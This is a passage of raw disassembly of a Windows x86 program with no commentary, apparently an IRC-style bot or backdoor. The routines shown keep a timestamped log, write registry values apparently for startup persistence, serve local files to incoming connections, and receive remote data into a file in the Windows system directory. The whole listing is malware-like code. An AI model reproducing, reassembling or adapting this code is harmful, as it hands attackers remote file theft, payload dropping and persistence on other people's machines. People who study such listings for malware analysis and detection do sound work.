call sub_40B078
pop ecx
push esi
call dword_43CA58 ; InternetCloseHandle
push [ebp+var_4]
call dword_43CA58 ; InternetCloseHandle
push [ebp+var_1D8]
call sub_4150F0
pop ecx
push ebx
call dword_421048 ; ExitThread
pop edi
pop esi
pop ebx
sub_40AD52 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AF80 proc near ; CODE XREF: sub_40CD3A+42C1�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
push edi
mov esi, offset dword_440E18
mov edi, 0B8h
loc_40AF94: ; CODE XREF: sub_40AF80+33�j
cmp byte ptr [esi], 0
jz short loc_40AFB7
push [ebp+arg_0]
push esi
call sub_415730
pop ecx
test eax, eax
pop ecx
jz short loc_40AFB7
inc [ebp+var_4]
add esi, edi
cmp esi, offset dword_441998
jl short loc_40AF94
jmp short loc_40AFF9
; ---------------------------------------------------------------------------
loc_40AFB7: ; CODE XREF: sub_40AF80+17�j
; sub_40AF80+26�j
mov esi, [ebp+var_4]
push ebx
imul esi, 0B8h
push edi
push 0
lea ebx, dword_440E18[esi]
push ebx
call sub_415390
push 17h
push [ebp+arg_0]
push ebx
call sub_416BE0
push 9Fh
lea eax, dword_440E30[esi]
push [ebp+arg_4]
push eax
call sub_416BE0
add esp, 24h
inc dword_42EA3C
pop ebx
loc_40AFF9: ; CODE XREF: sub_40AF80+35�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_40AF80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B000 proc near ; CODE XREF: sub_40CD3A+5551�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset dword_42BA38
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 14h
xor edi, edi
mov esi, offset dword_440E18
loc_40B02A: ; CODE XREF: sub_40B000+72�j
cmp byte ptr [esi], 0
jz short loc_40B065
lea eax, [esi+18h]
push eax
push esi
push edi
push offset dword_42BA2C
lea eax, [ebp+var_200]
push 200h
push eax
call sub_41588A
push 1
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 2Ch
loc_40B065: ; CODE XREF: sub_40B000+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_441998
jl short loc_40B02A
pop edi
pop esi
leave
retn
sub_40B000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B078 proc near ; CODE XREF: start+97�p sub_4010B2+32C�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
lea eax, [ebp+var_10]
push edi
push eax
call dword_42105C ; GetLocalTime
mov ebx, offset dword_440DE0
mov edi, 80h
mov esi, offset dword_43CDE0
loc_40B09A: ; CODE XREF: sub_40B078+3D�j
cmp byte ptr [ebx], 0
jz short loc_40B0B1
push 7Fh
lea eax, [ebx+80h]
push ebx
push eax
call sub_416BE0
add esp, 0Ch
loc_40B0B1: ; CODE XREF: sub_40B078+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_40B09A
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push edi
push esi
call sub_41588A
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_40B078 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B0EC proc near ; CODE XREF: sub_407B36+148�p
; sub_407CBD+15C�p ...
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_80]
push [ebp+arg_0]
push 80h
push eax
call sub_41732F
lea eax, [ebp+var_80]
push eax
call sub_40B078
add esp, 14h
leave
retn
sub_40B0EC endp
; =============== S U B R O U T I N E =======================================
sub_40B118 proc near ; CODE XREF: sub_40CD3A+5449�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset dword_43CDE0
xor ecx, ecx
loc_40B11F: ; CODE XREF: sub_40B118+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset dword_440DE0
jl short loc_40B11F
cmp [esp+arg_C], ecx
push esi
mov esi, offset dword_42BA6C
jnz short loc_40B14F
push ecx
push [esp+8+arg_8]
push esi
push [esp+10h+arg_4]
push [esp+14h+arg_0]
call sub_412BD1
add esp, 14h
loc_40B14F: ; CODE XREF: sub_40B118+1F�j
push esi
call sub_40B078
pop ecx
pop esi
retn
sub_40B118 endp
; =============== S U B R O U T I N E =======================================
sub_40B158 proc near ; CODE XREF: sub_4033B6+298�p
arg_0 = dword ptr 4
push esi
mov esi, offset dword_43CDE0
loc_40B15E: ; CODE XREF: sub_40B158+27�j
cmp byte ptr [esi], 0
jz short loc_40B173
push [esp+4+arg_0]
push esi
call sub_409A63
pop ecx
test eax, eax
pop ecx
jnz short loc_40B185
loc_40B173: ; CODE XREF: sub_40B158+9�j
add esi, 80h
cmp esi, offset dword_440DE0
jl short loc_40B15E
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40B185: ; CODE XREF: sub_40B158+19�j
xor eax, eax
pop esi
inc eax
retn
sub_40B158 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B18A proc near ; DATA XREF: sub_40CD3A+54FC�o
var_31C = byte ptr -31Ch
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp+var_11C]
xor edx, edx
rep movsd
xor edi, edi
mov [ebp+var_8], 80h
inc edi
cmp [ebp+var_10], edx
mov [ebp+var_4], edx
mov [eax+110h], edi
jnz short loc_40B1DD
push edx
lea eax, [ebp+var_118]
push [ebp+var_14]
push offset dword_42BAD4
push eax
push [ebp+var_11C]
call sub_412BD1
add esp, 14h
loc_40B1DD: ; CODE XREF: sub_40B18A+33�j
cmp [ebp+var_98], 0
jz short loc_40B1FD
lea eax, [ebp+var_98]
push eax
call sub_41587F
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short loc_40B1FD
mov [ebp+var_8], eax
loc_40B1FD: ; CODE XREF: sub_40B18A+5A�j
; sub_40B18A+6E�j
and [ebp+arg_0], 0
mov esi, offset dword_43CDE0
loc_40B206: ; CODE XREF: sub_40B18A+D4�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jge short loc_40B260
cmp byte ptr [esi], 0
jz short loc_40B24F
cmp [ebp+var_98], 0
jz short loc_40B235
cmp [ebp+var_4], 0
jnz short loc_40B235
lea eax, [ebp+var_98]
push eax
push esi
call sub_409A63
pop ecx
test eax, eax
pop ecx
jz short loc_40B24F
loc_40B235: ; CODE XREF: sub_40B18A+90�j
; sub_40B18A+96�j
push edi
lea eax, [ebp+var_118]
push [ebp+var_14]
push esi
push eax
push [ebp+var_11C]
call sub_412BD1
add esp, 14h
loc_40B24F: ; CODE XREF: sub_40B18A+87�j
; sub_40B18A+A9�j
inc [ebp+arg_0]
add esi, 80h
cmp esi, offset dword_440DE0
jl short loc_40B206
loc_40B260: ; CODE XREF: sub_40B18A+82�j
lea eax, [ebp+var_31C]
push offset dword_42BAA4
push eax
call sub_415316
xor esi, esi
pop ecx
cmp [ebp+var_10], esi
pop ecx
jnz short loc_40B29A
push esi
lea eax, [ebp+var_31C]
push [ebp+var_14]
push eax
lea eax, [ebp+var_118]
push eax
push [ebp+var_11C]
call sub_412BD1
add esp, 14h
loc_40B29A: ; CODE XREF: sub_40B18A+EE�j
lea eax, [ebp+var_31C]
push eax
call sub_40B078
push [ebp+var_18]
call sub_4150F0
pop ecx
pop ecx
push esi
call dword_421048 ; ExitThread
pop edi
pop esi
sub_40B18A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B2B9 proc near ; CODE XREF: sub_409D34+1E�p
; sub_40C574+341�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
xor edi, edi
xor esi, esi
mov ebx, offset dword_42C2D4
loc_40B2C9: ; CODE XREF: sub_40B2B9+6A�j
lea eax, [ebp+var_4]
push edi
push eax
push edi
push 0F003Fh
push edi
push edi
push edi
push off_42BAFC[esi]
push dword_42BAF8[esi]
call dword_43C9D8 ; RegCreateKeyExA
cmp [ebp+arg_0], edi
jz short loc_40B30A
push [ebp+arg_0]
call sub_415B10
pop ecx
push eax
push [ebp+arg_0]
push 1
push edi
push ebx
push [ebp+var_4]
call dword_43CA48 ; RegSetValueExA
jmp short loc_40B314
; ---------------------------------------------------------------------------
loc_40B30A: ; CODE XREF: sub_40B2B9+33�j
push ebx
push [ebp+var_4]
call dword_43C990 ; RegDeleteValueA
loc_40B314: ; CODE XREF: sub_40B2B9+4F�j
push [ebp+var_4]
call dword_43CA00 ; RegCloseKey
add esi, 8
cmp esi, 18h
jb short loc_40B2C9
pop edi
pop esi
pop ebx
leave
retn
sub_40B2B9 endp
; =============== S U B R O U T I N E =======================================
sub_40B32A proc near ; CODE XREF: sub_40B363+54�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
or esi, 0FFFFFFFFh
test edi, edi
jz short loc_40B35C
mov ecx, 0FFh
push ebx
loc_40B341: ; CODE XREF: sub_40B32A+2F�j
mov al, [edx]
mov ebx, esi
and eax, ecx
and ebx, ecx
xor eax, ebx
shr esi, 8
mov eax, dword_421260[eax*4]
xor esi, eax
inc edx
dec edi
jnz short loc_40B341
pop ebx
loc_40B35C: ; CODE XREF: sub_40B32A+F�j
mov eax, esi
pop edi
not eax
pop esi
retn
sub_40B32A endp
; =============== S U B R O U T I N E =======================================
sub_40B363 proc near ; CODE XREF: sub_40BBF7+23F�p
var_10 = dword ptr -10h
arg_0 = dword ptr 4
push ebx
push esi
xor ebx, ebx
push edi
push ebx
call sub_415BE9
mov [esp+10h+var_10], offset aRb ; "rb"
push [esp+10h+arg_0]
mov esi, eax
call sub_415A08
mov edi, eax
pop ecx
test edi, edi
pop ecx
jnz short loc_40B3AE
loc_40B388: ; CODE XREF: sub_40B363+37�j
xor eax, eax
jmp short loc_40B3CF
; ---------------------------------------------------------------------------
loc_40B38C: ; CODE XREF: sub_40B363+4F�j
inc ebx
push ebx
push esi
call sub_41737F
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_40B388
push edi
push 1
lea eax, [esi+ebx-1]
push 1
push eax
call sub_416A57
add esp, 10h
loc_40B3AE: ; CODE XREF: sub_40B363+23�j
test byte ptr [edi+0Ch], 10h
jz short loc_40B38C
dec ebx
push ebx
push esi
call sub_40B32A
push esi
mov ebx, eax
call sub_415C9B
push edi
call sub_415960
add esp, 10h
mov eax, ebx
loc_40B3CF: ; CODE XREF: sub_40B363+27�j
pop edi
pop esi
pop ebx
retn
sub_40B363 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B3D3 proc near ; CODE XREF: sub_40B459+33�p
; sub_40B9BC+BC�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
push 1
push 2
call dword_43CAA4 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jz short loc_40B44F
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_415390
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_4]
call dword_43CA24 ; ntohs
push [ebp+arg_0]
mov [ebp+var_E], ax
call dword_43CA64 ; inet_addr
cmp eax, esi
jnz short loc_40B434
push [ebp+arg_0]
call dword_43CAA8 ; gethostbyname
test eax, eax
jz short loc_40B44F
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_40B434: ; CODE XREF: sub_40B3D3+4B�j
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call dword_43C9CC ; connect
cmp eax, esi
jnz short loc_40B453
push edi
call dword_43CABC ; closesocket
loc_40B44F: ; CODE XREF: sub_40B3D3+1B�j
; sub_40B3D3+58�j
mov eax, esi
jmp short loc_40B455
; ---------------------------------------------------------------------------
loc_40B453: ; CODE XREF: sub_40B3D3+73�j
mov eax, edi
loc_40B455: ; CODE XREF: sub_40B3D3+7E�j
pop edi
pop esi
leave
retn
sub_40B3D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B459 proc near ; DATA XREF: sub_40CD3A+A26�o
var_11B4 = byte ptr -11B4h
var_1B4 = byte ptr -1B4h
var_1AC = byte ptr -1ACh
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 11B4h
call sub_415B90
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1B4]
rep movsd
push [ebp+var_14]
xor esi, esi
inc esi
mov [eax+1B0h], esi
lea eax, [ebp+var_1AC]
push eax
call sub_40B3D3
mov ebx, eax
pop ecx
cmp ebx, 0FFFFFFFFh
pop ecx
jnz short loc_40B4EC
lea eax, [ebp+var_11B4]
push offset dword_42BB9C
push eax
call sub_415316
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_40B4CF
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_412BD1
add esp, 14h
loc_40B4CF: ; CODE XREF: sub_40B459+59�j
lea eax, [ebp+var_11B4]
push eax
call sub_40B078
push [ebp+var_10]
call sub_4150F0
pop ecx
pop ecx
push esi
call dword_421048 ; ExitThread
loc_40B4EC: ; CODE XREF: sub_40B459+3F�j
push offset byte_43B658
push ebx
call sub_40A71A
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_40B557
lea eax, [ebp+var_11B4]
push offset dword_42BB58
push eax
call sub_415316
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_40B533
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_412BD1
add esp, 14h
loc_40B533: ; CODE XREF: sub_40B459+BD�j
lea eax, [ebp+var_11B4]
push eax
call sub_40B078
pop ecx
push ebx
call dword_43CABC ; closesocket
push [ebp+var_10]
call sub_4150F0
pop ecx
push esi
call dword_421048 ; ExitThread
loc_40B557: ; CODE XREF: sub_40B459+A3�j
push 64h
call dword_421060 ; Sleep
xor edi, edi
mov esi, 1000h
loc_40B566: ; CODE XREF: sub_40B459+168�j
push esi
lea eax, [ebp+var_11B4]
push edi
push eax
call sub_415390
add esp, 0Ch
lea eax, [ebp+var_11B4]
push edi
push esi
push eax
push ebx
call dword_43CA3C ; recv
test eax, eax
jle short loc_40B5C3
lea eax, [ebp+var_11B4]
push offset asc_426CF0 ; "\n"
push eax
call sub_415A30
lea eax, [ebp+var_11B4]
push eax
call sub_40A506
add esp, 0Ch
test eax, eax
jz short loc_40B5C3
push 64h
call dword_421060 ; Sleep
push 7
call sub_41501C
test eax, eax
pop ecx
jnz short loc_40B566
loc_40B5C3: ; CODE XREF: sub_40B459+130�j
; sub_40B459+154�j
lea eax, [ebp+var_11B4]
push offset dword_42BB10
push eax
call sub_415316
cmp [ebp+var_8], edi
pop ecx
pop ecx
jnz short loc_40B5F6
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_412BD1
add esp, 14h
loc_40B5F6: ; CODE XREF: sub_40B459+180�j
lea eax, [ebp+var_11B4]
push eax
call sub_40B078
pop ecx
push ebx
call dword_43CABC ; closesocket
push [ebp+var_10]
call sub_4150F0
pop ecx
push edi
call dword_421048 ; ExitThread
sub_40B459 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B61A proc near ; DATA XREF: sub_40CD3A+46A9�o
var_A04 = byte ptr -0A04h
var_604 = byte ptr -604h
var_500 = dword ptr -500h
var_4FC = dword ptr -4FCh
var_3FC = byte ptr -3FCh
var_1FC = dword ptr -1FCh
var_1F8 = dword ptr -1F8h
var_1E0 = byte ptr -1E0h
var_DC = byte ptr -0DCh
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = dword ptr -2Eh
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A04h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1FC]
rep movsd
xor ebx, ebx
xor esi, esi
inc ebx
push esi
push ebx
push 2
mov [eax+1B0h], ebx
mov [ebp+var_10], esi
mov [ebp+var_C], esi
mov [ebp+var_20], esi
call dword_43CAA4 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_18], edi
jnz short loc_40B668
push offset dword_42BD3C
jmp loc_40B821
; ---------------------------------------------------------------------------
loc_40B668: ; CODE XREF: sub_40B61A+42�j
push 10h
lea eax, [ebp+var_30]
push esi
push eax
call sub_415390
add esp, 0Ch
mov [ebp+var_30], 2
push esi
call dword_43CA24 ; ntohs
mov word ptr [ebp+var_2E], ax
lea eax, [ebp+var_30]
push 10h
push eax
push edi
mov [ebp+var_2E+2], esi
call dword_43CA50 ; bind
test eax, eax
jz short loc_40B6A6
push offset dword_42BD04
jmp loc_40B821
; ---------------------------------------------------------------------------
loc_40B6A6: ; CODE XREF: sub_40B61A+80�j
lea eax, [ebp+var_1C]
mov [ebp+var_1C], 10h
push eax
lea eax, [ebp+var_30]
push eax
push edi
call dword_43C9C8 ; getsockname
push [ebp+var_2E]
call dword_43C960 ; ntohs
mov [ebp+var_4], eax
lea eax, [ebp+var_1E0]
push eax
mov [ebp+arg_0], esi
call sub_415B10
pop ecx
loc_40B6D8: ; CODE XREF: sub_40B61A+EF�j
mov ecx, [ebp+arg_0]
mov al, [ebp+ecx+var_1E0]
cmp al, 20h
jnz short loc_40B6EB
push 5Fh
pop eax
jmp short loc_40B6EE
; ---------------------------------------------------------------------------
loc_40B6EB: ; CODE XREF: sub_40B61A+CA�j
movsx eax, al
loc_40B6EE: ; CODE XREF: sub_40B61A+CF�j
mov [ebp+ecx+var_604], al
lea eax, [ebp+var_1E0]
inc ecx
push eax
mov [ebp+arg_0], ecx
call sub_415B10
cmp [ebp+arg_0], eax
pop ecx
jbe short loc_40B6D8
push ebx
push edi
call dword_43CA4C ; listen
test eax, eax
jz short loc_40B721
push offset dword_42BB9C
jmp loc_40B821
; ---------------------------------------------------------------------------
loc_40B721: ; CODE XREF: sub_40B61A+FB�j
push esi
push esi
push 3
push esi
push ebx
lea eax, [ebp+var_1E0]
push 80000000h
push eax
call dword_421078 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_40B74B
push offset dword_42BCD0
jmp loc_40B821
; ---------------------------------------------------------------------------
loc_40B74B: ; CODE XREF: sub_40B61A+125�j
push esi
push eax
call dword_421090 ; GetFileSize
mov [ebp+arg_0], eax
push eax
movzx eax, word ptr [ebp+var_4]
push eax
push [ebp+var_1FC]
call sub_40A08A
pop ecx
push eax
call dword_43CA64 ; inet_addr
push eax
call dword_43CA20 ; ntohl
push eax
lea eax, [ebp+var_1E0]
push eax
lea eax, [ebp+var_3FC]
push offset dword_42BCB8
push eax
call sub_415316
push esi
lea eax, [ebp+var_3FC]
push esi
push eax
lea eax, [ebp+var_DC]
push eax
push [ebp+var_1FC]
call sub_412BD1
add esp, 2Ch
lea eax, [ebp+var_38]
mov [ebp+var_38], 3Ch
mov [ebp+var_34], esi
push eax
push esi
lea eax, [ebp+var_500]
push esi
push eax
push esi
mov [ebp+var_4FC], edi
mov [ebp+var_500], ebx
call dword_43CA0C ; select
test eax, eax
jg short loc_40B7FB
push esi
lea eax, [ebp+var_DC]
push [ebp+var_54]
push offset dword_42BC8C
push eax
push [ebp+var_1FC]
call sub_412BD1
jmp loc_40B91F
; ---------------------------------------------------------------------------
loc_40B7FB: ; CODE XREF: sub_40B61A+1BF�j
lea eax, [ebp+var_14]
mov [ebp+var_14], 10h
push eax
lea eax, [ebp+var_48]
push eax
push edi
call dword_43CAB8 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_1F8], eax
jnz short loc_40B834
push offset dword_42BC54
loc_40B821: ; CODE XREF: sub_40B61A+49�j
; sub_40B61A+87�j ...
lea eax, [ebp+var_3FC]
push eax
call sub_415316
pop ecx
pop ecx
jmp loc_40B922
; ---------------------------------------------------------------------------
loc_40B834: ; CODE XREF: sub_40B61A+200�j
push edi
call dword_43CABC ; closesocket
cmp [ebp+arg_0], esi
jz loc_40B8E6
mov edi, 400h
loc_40B849: ; CODE XREF: sub_40B61A+2C3�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
cmp eax, edi
jge short loc_40B856
mov [ebp+var_4], eax
loc_40B856: ; CODE XREF: sub_40B61A+237�j
push edi
lea eax, [ebp+var_A04]
push esi
push eax
call sub_415390
mov eax, [ebp+arg_0]
add esp, 0Ch
neg eax
push 2
push esi
push eax
push [ebp+var_8]
call dword_4210AC ; SetFilePointer
lea eax, [ebp+var_20]
push esi
push eax
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_8]
call dword_421068 ; ReadFile
push esi
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_1F8]
call dword_43CA74 ; send
mov [ebp+var_4], eax
push esi
cdq
add [ebp+var_10], eax
lea eax, [ebp+var_A04]
push edi
push eax
push [ebp+var_1F8]
adc [ebp+var_C], edx
call dword_43CA3C ; recv
cmp eax, ebx
jl loc_40B97B
mov eax, [ebp+var_4]
cmp eax, ebx
jl loc_40B97B
sub [ebp+arg_0], eax
jnz loc_40B849
mov edi, [ebp+var_18]
loc_40B8E6: ; CODE XREF: sub_40B61A+224�j
push [ebp+var_8]
call dword_42106C ; CloseHandle
push [ebp+var_C]
push [ebp+var_10]
call sub_40C10D
pop ecx
pop ecx
push eax
lea eax, [ebp+var_1E0]
push eax
push [ebp+var_44]
call dword_43CAB0 ; inet_ntoa
push eax
lea eax, [ebp+var_3FC]
push offset dword_42BC00
push eax
call sub_415316
loc_40B91F: ; CODE XREF: sub_40B61A+1DC�j
add esp, 14h
loc_40B922: ; CODE XREF: sub_40B61A+215�j
cmp [ebp+var_50], esi
jnz short loc_40B947
push esi
lea eax, [ebp+var_3FC]
push [ebp+var_54]
push eax
lea eax, [ebp+var_DC]
push eax
push [ebp+var_1FC]
call sub_412BD1
add esp, 14h
loc_40B947: ; CODE XREF: sub_40B61A+30B�j
lea eax, [ebp+var_3FC]
push eax
call sub_40B078
cmp edi, esi
pop ecx
jbe short loc_40B95F
push edi
call dword_43CABC ; closesocket
loc_40B95F: ; CODE XREF: sub_40B61A+33C�j
push [ebp+var_1F8]
call dword_43CABC ; closesocket
push [ebp+var_58]
call sub_4150F0
pop ecx
push esi
call dword_421048 ; ExitThread
loc_40B97B: ; CODE XREF: sub_40B61A+2AF�j
; sub_40B61A+2BA�j
push esi
mov esi, offset dword_42BBD4
push [ebp+var_54]
lea eax, [ebp+var_DC]
push esi
push eax
push [ebp+var_1FC]
call sub_412BD1
push esi
call sub_40B078
add esp, 18h
push [ebp+var_1F8]
call dword_43CABC ; closesocket
push [ebp+var_58]
call sub_4150F0
pop ecx
push ebx
call dword_421048 ; ExitThread
sub_40B61A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B9BC proc near ; DATA XREF: sub_40CD3A+77C�o
var_14C4 = byte ptr -14C4h
var_4C4 = byte ptr -4C4h
var_2C4 = byte ptr -2C4h
var_1C0 = dword ptr -1C0h
var_1B8 = byte ptr -1B8h
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 14C4h
call sub_415B90
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1C0]
rep movsd
xor esi, esi
xor ebx, ebx
inc esi
push 104h
mov [eax+1B0h], esi
lea eax, [ebp+var_2C4]
push eax
mov [ebp+var_8], ebx
call dword_421058 ; GetSystemDirectoryA
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+var_2C4]
push eax
lea eax, [ebp+var_2C4]
push offset aSS_2 ; "%s%s"
push eax
call sub_415316
add esp, 10h
lea eax, [ebp+var_2C4]
push ebx
push 80h
push 2
push ebx
push esi
push 40000000h
push eax
call dword_421078 ; CreateFileA
cmp eax, 0FFFFFFFFh
jnz short loc_40BA46
push offset dword_42BE48
jmp short loc_40BA8C
; ---------------------------------------------------------------------------
loc_40BA46: ; CODE XREF: sub_40B9BC+81�j
push eax
call dword_42106C ; CloseHandle
lea eax, [ebp+var_2C4]
push offset aAB ; "a+b"
push eax
call sub_415A08
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jnz short loc_40BA6E
push offset dword_42BE04
jmp short loc_40BA8C
; ---------------------------------------------------------------------------
loc_40BA6E: ; CODE XREF: sub_40B9BC+A9�j
push [ebp+var_20]
lea eax, [ebp+var_1B8]
push eax
call sub_40B3D3
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+arg_0], eax
jnz short loc_40BA9F
push offset dword_42BDD0
loc_40BA8C: ; CODE XREF: sub_40B9BC+88�j
; sub_40B9BC+B0�j
lea eax, [ebp+var_4C4]
push eax
call sub_415316
pop ecx
pop ecx
jmp loc_40BB99
; ---------------------------------------------------------------------------
loc_40BA9F: ; CODE XREF: sub_40B9BC+C9�j
mov esi, 1000h
loc_40BAA4: ; CODE XREF: sub_40B9BC+14E�j
push esi
lea eax, [ebp+var_14C4]
push ebx
push eax
call sub_415390
add esp, 0Ch
lea eax, [ebp+var_14C4]
push ebx
push esi
push eax
push [ebp+arg_0]
call dword_43CA3C ; recv
mov edi, eax
cmp edi, ebx
jz loc_40BB6B
cmp edi, 0FFFFFFFFh
jz short loc_40BB0C
push [ebp+var_4]
lea eax, [ebp+var_14C4]
push edi
push 1
push eax
call sub_41761F
add [ebp+var_8], edi
add esp, 10h
push [ebp+var_8]
call dword_43CA20 ; ntohl
mov [ebp+var_C], eax
push ebx
lea eax, [ebp+var_C]
push 4
push eax
push [ebp+arg_0]
call dword_43CA74 ; send
jmp short loc_40BAA4
; ---------------------------------------------------------------------------
loc_40BB0C: ; CODE XREF: sub_40B9BC+118�j
lea eax, [ebp+var_4C4]
push offset dword_42BBD4
push eax
call sub_415316
push ebx
lea eax, [ebp+var_4C4]
push [ebp+var_18]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_1C0]
call sub_412BD1
lea eax, [ebp+var_4C4]
push eax
call sub_40B078
push [ebp+var_4]
call sub_415960
add esp, 24h
push [ebp+arg_0]
call dword_43CABC ; closesocket
push [ebp+var_1C]
call sub_4150F0
pop ecx
push 1
call dword_421048 ; ExitThread
loc_40BB6B: ; CODE XREF: sub_40B9BC+10F�j
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_40C10D
push eax
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_4C4]
push offset dword_42BD78
push eax
call sub_415316
add esp, 1Ch
loc_40BB99: ; CODE XREF: sub_40B9BC+DE�j
cmp [ebp+var_14], ebx
jnz short loc_40BBBE
push ebx
lea eax, [ebp+var_4C4]
push [ebp+var_18]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_1C0]
call sub_412BD1
add esp, 14h
loc_40BBBE: ; CODE XREF: sub_40B9BC+1E0�j
lea eax, [ebp+var_4C4]
push eax
call sub_40B078
cmp [ebp+var_4], ebx
pop ecx
jz short loc_40BBD9
push [ebp+var_4]
call sub_415960
pop ecx
